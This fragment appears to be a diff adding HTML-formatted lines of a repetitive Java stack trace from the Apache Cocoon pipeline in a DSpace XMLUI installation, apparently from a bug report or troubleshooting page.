+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:55)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.sitemap.MatchNode.invoke(MatchNode.java:87)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.sitemap.SelectNode.invoke(SelectNode.java:82)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.sitemap.PipelineNode.invoke(PipelineNode.java:143)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.sitemap.PipelinesNode.invoke(PipelinesNode.java:81)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:239)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.buildPipeline(ConcreteTreeProcessor.java:186)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.TreeProcessor.buildPipeline(TreeProcessor.java:260)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.sitemap.MountNode.invoke(MountNode.java:107)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.sitemap.SelectNode.invoke(SelectNode.java:87)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:55)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.sitemap.MatchNode.invoke(MatchNode.java:87)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.sitemap.PipelineNode.invoke(PipelineNode.java:143)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.sitemap.PipelinesNode.invoke(PipelinesNode.java:81)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:239)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.buildPipeline(ConcreteTreeProcessor.java:186)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.TreeProcessor.buildPipeline(TreeProcessor.java:260)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.sitemap.MountNode.invoke(MountNode.java:107)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:55)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.sitemap.MatchNode.invoke(MatchNode.java:87)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.sitemap.PipelineNode.invoke(PipelineNode.java:143)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.sitemap.PipelinesNode.invoke(PipelinesNode.java:81)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:239)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.buildPipeline(ConcreteTreeProcessor.java:186)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.TreeProcessor.buildPipeline(TreeProcessor.java:260)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.impl.SitemapSource.init(SitemapSource.java:277)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.impl.SitemapSource.&lt;init&gt;(SitemapSource.java:148)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.impl.SitemapSourceFactory.getSource(SitemapSourceFactory.java:62)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:153)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:183)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.generation.FileGenerator.setup(FileGenerator.java:99)
+</span></span><span style="display:flex;"><span>    at org.dspace.app.xmlui.cocoon.AspectGenerator.setup(AspectGenerator.java:81)
+</span></span><span style="display:flex;"><span>    at sun.reflect.GeneratedMethodAccessor255.invoke(Unknown Source)
+</span></span><span style="display:flex;"><span>    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+</span></span><span style="display:flex;"><span>    at java.lang.reflect.Method.invoke(Method.java:498)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+</span></span><span style="display:flex;"><span>    at com.sun.proxy.$Proxy190.setup(Unknown Source)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.setupPipeline(AbstractProcessingPipeline.java:343)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.setupPipeline(AbstractCachingProcessingPipeline.java:710)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.preparePipeline(AbstractProcessingPipeline.java:466)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.prepareInternal(AbstractProcessingPipeline.java:480)
+</span></span><span style="display:flex;"><span>    at sun.reflect.GeneratedMethodAccessor267.invoke(Unknown Source)
+</span></span><span style="display:flex;"><span>    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+</span></span><span style="display:flex;"><span>    at java.lang.reflect.Method.invoke(Method.java:498)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+</span></span><span style="display:flex;"><span>    at com.sun.proxy.$Proxy189.prepareInternal(Unknown Source)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.impl.SitemapSource.init(SitemapSource.java:292)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.impl.SitemapSource.&lt;init&gt;(SitemapSource.java:148)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.impl.SitemapSourceFactory.getSource(SitemapSourceFactory.java:62)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:153)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:183)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.generation.FileGenerator.setup(FileGenerator.java:99)
+</span></span><span style="display:flex;"><span>    at org.dspace.app.xmlui.cocoon.AspectGenerator.setup(AspectGenerator.java:81)
+</span></span><span style="display:flex;"><span>    at sun.reflect.GeneratedMethodAccessor255.invoke(Unknown Source)
+</span></span><span style="display:flex;"><span>    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+</span></span><span style="display:flex;"><span>    at java.lang.reflect.Method.invoke(Method.java:498)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+</span></span><span style="display:flex;"><span>    at com.sun.proxy.$Proxy190.setup(Unknown Source)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.setupPipeline(AbstractProcessingPipeline.java:343)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.setupPipeline(AbstractCachingProcessingPipeline.java:710)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.preparePipeline(AbstractProcessingPipeline.java:466)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.prepareInternal(AbstractProcessingPipeline.java:480)
+</span></span><span style="display:flex;"><span>    at sun.reflect.GeneratedMethodAccessor267.invoke(Unknown Source)
+</span></span><span style="display:flex;"><span>    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+</span></span><span style="display:flex;"><span>    at java.lang.reflect.Method.invoke(Method.java:498)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+</span></span><span style="display:flex;"><span>    at com.sun.proxy.$Proxy189.prepareInternal(Unknown Source)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.impl.SitemapSource.init(SitemapSource.java:292)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.impl.SitemapSource.&lt;init&gt;(SitemapSource.java:148)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.impl.SitemapSourceFactory.getSource(SitemapSourceFactory.java:62)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:153)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:183)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.generation.FileGenerator.setup(FileGenerator.java:99)
+</span></span><span style="display:flex;"><span>    at org.dspace.app.xmlui.cocoon.AspectGenerator.setup(AspectGenerator.java:81)
+</span></span><span style="display:flex;"><span>    at sun.reflect.GeneratedMethodAccessor255.invoke(Unknown Source)
+</span></span><span style="display:flex;"><span>    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+</span></span><span style="display:flex;"><span>    at java.lang.reflect.Method.invoke(Method.java:498)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+</span></span><span style="display:flex;"><span>    at com.sun.proxy.$Proxy190.setup(Unknown Source)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.setupPipeline(AbstractProcessingPipeline.java:343)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.setupPipeline(AbstractCachingProcessingPipeline.java:710)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.preparePipeline(AbstractProcessingPipeline.java:466)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.prepareInternal(AbstractProcessingPipeline.java:480)
+</span></span><span style="display:flex;"><span>    at sun.reflect.GeneratedMethodAccessor267.invoke(Unknown Source)
+</span></span><span style="display:flex;"><span>    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+</span></span><span style="display:flex;"><span>    at java.lang.reflect.Method.invoke(Method.java:498)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+</span></span><span style="display:flex;"><span>    at com.sun.proxy.$Proxy189.prepareInternal(Unknown Source)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.impl.SitemapSource.init(SitemapSource.java:292)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.impl.SitemapSource.&lt;init&gt;(SitemapSource.java:148)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.impl.SitemapSourceFactory.getSource(SitemapSourceFactory.java:62)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:153)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:183)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.generation.FileGenerator.setup(FileGenerator.java:99)
+</span></span><span style="display:flex;"><span>    at org.dspace.app.xmlui.cocoon.AspectGenerator.setup(AspectGenerator.java:81)
+</span></span><span style="display:flex;"><span>    at sun.reflect.GeneratedMethodAccessor255.invoke(Unknown Source)
+</span></span><span style="display:flex;"><span>    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+</span></span><span style="display:flex;"><span>    at java.lang.reflect.Method.invoke(Method.java:498)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+</span></span><span style="display:flex;"><span>    at com.sun.proxy.$Proxy190.setup(Unknown Source)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.setupPipeline(AbstractProcessingPipeline.java:343)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.setupPipeline(AbstractCachingProcessingPipeline.java:710)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.preparePipeline(AbstractProcessingPipeline.java:466)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.prepareInternal(AbstractProcessingPipeline.java:480)
+</span></span><span style="display:flex;"><span>    at sun.reflect.GeneratedMethodAccessor267.invoke(Unknown Source)
+</span></span><span style="display:flex;"><span>    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+</span></span><span style="display:flex;"><span>    at java.lang.reflect.Method.invoke(Method.java:498)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+</span></span><span style="display:flex;"><span>    at com.sun.proxy.$Proxy189.prepareInternal(Unknown Source)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.impl.SitemapSource.init(SitemapSource.java:292)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.impl.SitemapSource.&lt;init&gt;(SitemapSource.java:148)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.impl.SitemapSourceFactory.getSource(SitemapSourceFactory.java:62)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:153)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:183)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.generation.FileGenerator.setup(FileGenerator.java:99)
+</span></span><span style="display:flex;"><span>    at org.dspace.app.xmlui.cocoon.AspectGenerator.setup(AspectGenerator.java:81)
+</span></span><span style="display:flex;"><span>    at sun.reflect.GeneratedMethodAccessor255.invoke(Unknown Source)
+</span></span><span style="display:flex;"><span>    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+</span></span><span style="display:flex;"><span>    at java.lang.reflect.Method.invoke(Method.java:498)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+</span></span><span style="display:flex;"><span>    at com.sun.proxy.$Proxy190.setup(Unknown Source)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.setupPipeline(AbstractProcessingPipeline.java:343)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.setupPipeline(AbstractCachingProcessingPipeline.java:710)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.preparePipeline(AbstractProcessingPipeline.java:466)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.prepareInternal(AbstractProcessingPipeline.java:480)
+</span></span><span style="display:flex;"><span>    at sun.reflect.GeneratedMethodAccessor267.invoke(Unknown Source)
+</span></span><span style="display:flex;"><span>    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+</span></span><span style="display:flex;"><span>    at java.lang.reflect.Method.invoke(Method.java:498)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+</span></span><span style="display:flex;"><span>    at com.sun.proxy.$Proxy189.prepareInternal(Unknown Source)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.impl.SitemapSource.init(SitemapSource.java:292)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.impl.SitemapSource.&lt;init&gt;(SitemapSource.java:148)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.impl.SitemapSourceFactory.getSource(SitemapSourceFactory.java:62)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:153)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:183)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.generation.FileGenerator.setup(FileGenerator.java:99)
+</span></span><span style="display:flex;"><span>    at org.dspace.app.xmlui.cocoon.AspectGenerator.setup(AspectGenerator.java:81)
+</span></span><span style="display:flex;"><span>    at sun.reflect.GeneratedMethodAccessor255.invoke(Unknown Source)
+</span></span><span style="display:flex;"><span>    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+</span></span><span style="display:flex;"><span>    at java.lang.reflect.Method.invoke(Method.java:498)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+</span></span><span style="display:flex;"><span>    at com.sun.proxy.$Proxy190.setup(Unknown Source)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.setupPipeline(AbstractProcessingPipeline.java:343)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.setupPipeline(AbstractCachingProcessingPipeline.java:710)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.preparePipeline(AbstractProcessingPipeline.java:466)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.prepareInternal(AbstractProcessingPipeline.java:480)
+</span></span><span style="display:flex;"><span>    at sun.reflect.GeneratedMethodAccessor267.invoke(Unknown Source)
+</span></span><span style="display:flex;"><span>    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+</span></span><span style="display:flex;"><span>    at java.lang.reflect.Method.invoke(Method.java:498)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+</span></span><span style="display:flex;"><span>    at com.sun.proxy.$Proxy189.prepareInternal(Unknown Source)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.impl.SitemapSource.init(SitemapSource.java:292)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.impl.SitemapSource.&lt;init&gt;(SitemapSource.java:148)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.impl.SitemapSourceFactory.getSource(SitemapSourceFactory.java:62)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:153)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:183)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.generation.FileGenerator.setup(FileGenerator.java:99)
+</span></span><span style="display:flex;"><span>    at org.dspace.app.xmlui.cocoon.AspectGenerator.setup(AspectGenerator.java:81)
+</span></span><span style="display:flex;"><span>    at sun.reflect.GeneratedMethodAccessor255.invoke(Unknown Source)
+</span></span><span style="display:flex;"><span>    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+</span></span><span style="display:flex;"><span>    at java.lang.reflect.Method.invoke(Method.java:498)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+</span></span><span style="display:flex;"><span>    at com.sun.proxy.$Proxy190.setup(Unknown Source)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.setupPipeline(AbstractProcessingPipeline.java:343)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.setupPipeline(AbstractCachingProcessingPipeline.java:710)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.preparePipeline(AbstractProcessingPipeline.java:466)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.prepareInternal(AbstractProcessingPipeline.java:480)
+</span></span><span style="display:flex;"><span>    at sun.reflect.GeneratedMethodAccessor267.invoke(Unknown Source)
+</span></span><span style="display:flex;"><span>    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+</span></span><span style="display:flex;"><span>    at java.lang.reflect.Method.invoke(Method.java:498)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+</span></span><span style="display:flex;"><span>    at com.sun.proxy.$Proxy189.prepareInternal(Unknown Source)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.impl.SitemapSource.init(SitemapSource.java:292)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.impl.SitemapSource.&lt;init&gt;(SitemapSource.java:148)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.impl.SitemapSourceFactory.getSource(SitemapSourceFactory.java:62)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:153)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:183)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.generation.FileGenerator.setup(FileGenerator.java:99)
+</span></span><span style="display:flex;"><span>    at org.dspace.app.xmlui.cocoon.AspectGenerator.setup(AspectGenerator.java:81)
+</span></span><span style="display:flex;"><span>    at sun.reflect.GeneratedMethodAccessor255.invoke(Unknown Source)
+</span></span><span style="display:flex;"><span>    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+</span></span><span style="display:flex;"><span>    at java.lang.reflect.Method.invoke(Method.java:498)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+</span></span><span style="display:flex;"><span>    at com.sun.proxy.$Proxy190.setup(Unknown Source)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.setupPipeline(AbstractProcessingPipeline.java:343)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.setupPipeline(AbstractCachingProcessingPipeline.java:710)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.preparePipeline(AbstractProcessingPipeline.java:466)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.prepareInternal(AbstractProcessingPipeline.java:480)
+</span></span><span style="display:flex;"><span>    at sun.reflect.GeneratedMethodAccessor267.invoke(Unknown Source)
+</span></span><span style="display:flex;"><span>    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+</span></span><span style="display:flex;"><span>    at java.lang.reflect.Method.invoke(Method.java:498)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+</span></span><span style="display:flex;"><span>    at com.sun.proxy.$Proxy189.prepareInternal(Unknown Source)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.impl.SitemapSource.init(SitemapSource.java:292)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.impl.SitemapSource.&lt;init&gt;(SitemapSource.java:148)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.impl.SitemapSourceFactory.getSource(SitemapSourceFactory.java:62)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:153)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.source.CocoonSourceResolver.resolveURI(CocoonSourceResolver.java:183)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.generation.FileGenerator.setup(FileGenerator.java:99)
+</span></span><span style="display:flex;"><span>    at sun.reflect.GeneratedMethodAccessor255.invoke(Unknown Source)
+</span></span><span style="display:flex;"><span>    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+</span></span><span style="display:flex;"><span>    at java.lang.reflect.Method.invoke(Method.java:498)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+</span></span><span style="display:flex;"><span>    at com.sun.proxy.$Proxy190.setup(Unknown Source)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.setupPipeline(AbstractProcessingPipeline.java:343)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.setupPipeline(AbstractCachingProcessingPipeline.java:710)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.preparePipeline(AbstractProcessingPipeline.java:466)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:411)
+</span></span><span style="display:flex;"><span>    at sun.reflect.GeneratedMethodAccessor331.invoke(Unknown Source)
+</span></span><span style="display:flex;"><span>    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+</span></span><span style="display:flex;"><span>    at java.lang.reflect.Method.invoke(Method.java:498)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+</span></span><span style="display:flex;"><span>    at com.sun.proxy.$Proxy189.process(Unknown Source)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.sitemap.SerializeNode.invoke(SerializeNode.java:147)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:55)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.sitemap.MatchNode.invoke(MatchNode.java:87)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.sitemap.PipelineNode.invoke(PipelineNode.java:143)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.sitemap.PipelinesNode.invoke(PipelinesNode.java:81)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:239)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:171)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.TreeProcessor.process(TreeProcessor.java:247)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.sitemap.MountNode.invoke(MountNode.java:117)
